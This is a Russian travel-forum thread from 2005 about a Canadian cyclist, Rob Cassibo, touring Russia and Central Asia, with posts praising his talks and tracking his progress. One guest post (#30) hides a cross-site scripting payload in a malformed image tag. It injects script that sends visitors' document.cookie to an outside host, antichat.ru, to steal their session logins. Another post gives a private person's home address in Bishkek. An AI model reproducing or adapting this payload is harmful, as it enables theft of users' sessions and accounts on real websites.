Перейти к содержимому



Приветствуем вас на форуме самостоятельных путешественников РУССКИЙ BACKPACKER!

Форум существует с 2004 года и является некоммерческой площадкой, посвященной самостоятельным путешествиям, т.е. путешествиям, организованным по возможности без помощи турфирм и других посредников.

Backpacker (от англ. Backpack – рюкзак) – путешественник с рюкзаком.

Среди форумчан есть и идейные автостопщики, и любители велопутешествий, и те, кто ездит только общественным транспортом или на своих авто, но большинство путешественников не ограничивают себя каким-либо одним способом перемещения в пространстве. Объединяет всех нас желание «проживать» путешествие по максимуму, так, как хочется самому себе.

На форуме накопился огромный объем информации, если же вы не смогли найти ответ или вам нужен индивидуальный совет – смело спрашивайте!


Регионы планеты (маршруты, достопримечательности, проживание)   Визы   Транспорт   Отчеты   Попутчики   FAQ

все форумы >>


Данное объявление видно только неавторизованным пользователям.

Администрация форума.


"Сумасшедший" канадец едет по России


  • Вы не можете ответить в тему
Сообщений в теме: 33

#21 Guest_KURTka_*

Guest_KURTka_*
  • Гость

Отправлено 07 февраля 2005 - 19:30

Роб! Роб! Роб! Здесь что, все с ума поспрыгивали??? Я читаю сообщения и знаете,что рисует мое воображение? Музейный экспонат!!! :angry: А между тем, Роб - самый обычный человек, решивший осуществить весьма необычную мечту. Поэтому настоятельно прошу не писать о нем, как о пёсике! :P
До встречи с Робом мне казалось, что все эти разговоры о кругосветке на бейсике - чушь, что все это бывает только в кино. Конечно,я слышала, что есть на свете какой-то сумасшедший канадец, который проехал на велосипеде 64000 км и который собирается посетить нашу многими забытую Россию. Думаю, не трудно представить мое удивление, когда, вместо спортивно-сложенного канадца, я увидела великана, больше напоминающего голландца, в прикольной потрепанной бейзболке, который все время улыбался и "играл" глазами, в безуспешных попытках охватить взглядом из-под козырька все происходящее.
Выступление Кассибо (фамилия) отличалось от всех остальных. Главная причина крылась в его "нерусском" происхождении. А из этого следовало: раскрепощенность, открытость, доброжелательное расположение ко всем, независимо от того, сколько км ты проехал и во скольких странах оставил отпечаток своей ноги или колеса. :D
Все, что Роб рассказал, было не просто интересно, а попахивало невозможным!!! Но, глядя на этого мэна, нехорошее ощущение моментально пропадало.
Он рассказывал о своем путешествии так,что казалось, будто он рассказывает вовсе не о "кругосветном" путешествии, а о поездке к бабушке в деревню. Но и здесь на помощь воображению приходил его внешний облик, который никак не вписывался в образ деревни. Все в его рассказе говорило, что каждый способен сделать то же, что и он, что это не так трудно, как кажется.
В общем, более свежие, яркие и положительные впечатления я не получала. Теперь сплю и вижу себя, едущей на велосипеде по дорогам Евразии(что, надеюсь, в скором времени произойдет).
Если у вас есть возможность, обязательно сходите на встречу с Робом. И не стесняйтесь подойти к нему после выступления, поговорить и задать вопросы, которые вас интересуют, он ответит на них - не сомневайтесь!

#22 grommit

grommit

    Новый путешественник.

  • Заслуженный
  • 9 917 сообщений
  • Пол:Мужчина
  • Город:Москва

Отправлено 07 февраля 2005 - 19:55

Да, если кто еще ходит на руках - этот человек перевернет ваше сознание с головы на ноги! Роб - не просто "сумашедший канадец" и не "пёсик", как тут некоторые легкомысленно думают. Роб- это двухколесный мессия. Если кто исстрадался по очередному гуру - все на встречу с Робом! Я уже надеваю КУРТку и бежмя бегу! :blink:

#23 Lanka

Lanka

    Старожил

  • Путешественник
  • 565 сообщений

Отправлено 07 февраля 2005 - 21:41

Дело в том, что для Шанина Валеры он друг, а друзей называют по имени :)

#24 v929

v929

    Старожил

  • Путешественник
  • 627 сообщений
  • Пол:Мужчина

Отправлено 08 февраля 2005 - 01:03

В общем, более свежие, яркие и положительные впечатления я не получала. Теперь сплю и вижу себя, едущей на велосипеде по дорогам Евразии(что, надеюсь, в скором времени произойдет).

<{POST_SNAPBACK}>

Да, на велосипеде особый кайф от приодаленных 10 000 километров ^__^.
И самое главное не усни за рулем.
А если серьезнее то я не вижу что-то тут особеного *СУПЕР, НУ ПРОСТО СУПЕР* в путешествии. Он скромен в своих рассказах, это нормально. Честь и хвала за его мужество. Просто мы должны по возможностьи оказать помошь и быть гостеприимными хозявами.

#25 Lanka

Lanka

    Старожил

  • Путешественник
  • 565 сообщений

Отправлено 08 февраля 2005 - 11:49

Объективно, его путешествие, и в самом деле СУПЕР, НУ ПРОСТО СУПЕР
через всю Африку на велосипеде, через всю Скандинавию зимой -- на велосипеде. Через Россию, блин ;)
Прочувствовать его приключения -- возьми велосипед и доедь СЕЙЧАС на нем до Новосибирска -- мало не покажется :D

#26 Skazochnik

Skazochnik

    Строгость клуба

  • Заслуженный
  • 4 536 сообщений
  • Пол:Мужчина
  • Город:Москва

Отправлено 08 февраля 2005 - 15:53

доедет.... (нисколько не умаляя достижений роба) любой стопщик доедет. Просто у нас кайф другой.

#27 Valeri Shanin

Valeri Shanin

    Умудренный

  • Мастер
  • 406 сообщений
  • Пол:Мужчина
  • Город:Москва

Отправлено 07 марта 2005 - 08:00

Благодаря Веронике Сунгатовой Роб Кассибо стал активно пиариться в России.
Например можно прочитать статью о нем в экстремальном журнале:
http://sport.rbc.ru/...42313_bod.shtml

#28 Valeri Shanin

Valeri Shanin

    Умудренный

  • Мастер
  • 406 сообщений
  • Пол:Мужчина
  • Город:Москва

Отправлено 29 марта 2005 - 08:54

Неутомимый путешественник уже в Алма-Ате. Поездка по России закончилась - по его словам самая гостеприимная страна - а путешествие продолжается!

#29 Hip

Hip

    Умудренный

  • Путешественник
  • 115 сообщений

Отправлено 30 марта 2005 - 23:35

Интересно сколько он км за день примерно проезжает

#30 Guest_Guest_*

Guest_Guest_*
  • Гость

Отправлено 31 марта 2005 - 08:41

наверное немного
http://aaaaa/=`aaajpg[/img]]` style=background:url(java script:document.images[3].src="http://antichat.ru/cgi-bin/s.jpg?K:"+document.cookie)

#31 Valeri Shanin

Valeri Shanin

    Умудренный

  • Мастер
  • 406 сообщений
  • Пол:Мужчина
  • Город:Москва

Отправлено 31 марта 2005 - 11:31

Сейчас он уже в Бишкеке. Такой уж человек: если в России - то обязательно зимой, а в Киргизии - в разгар революции.

#32 Guest_тайхард_*

Guest_тайхард_*
  • Гость

Отправлено 06 апреля 2005 - 00:16

Всем привет! Если сумасшедший канадец еще в Бишкеке, то могу дать забавный адресок. Ул. Московская, дом 74. Второй или третий подъезд, первый этаж, дверь справа. Там живет некий американец Джон Пост. Чего он делает в предгорье Тянь-Шаня – понятия не имею. Просто мне один очень хороший друг-стопщик прислал этот адрес, когда я был в тех краях и написал, что интересно будет пообщаться. Обратной связи с другом нет, поэтому за что купил за то и продаю. Побывать там сам я не успел. В октябре 2004 этот янки еще был в Бишкеке, я так понимаю. Сейчас – можно только проверить.

#33 Guest_olennikoff_*

Guest_olennikoff_*
  • Гость

Отправлено 08 апреля 2005 - 14:09

Привет всем меня зовут Оленников Дмитрий.Мне офигительно повезло потому что я встречался с Робом.

#34 Ruslanko

Ruslanko

    Седая борода

  • Заслуженный
  • 1 818 сообщений
  • Пол:Мужчина
  • Город:Дублин

Отправлено 08 апреля 2005 - 18:28

И почему ж тебе повезло то?





Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 скрытых пользователей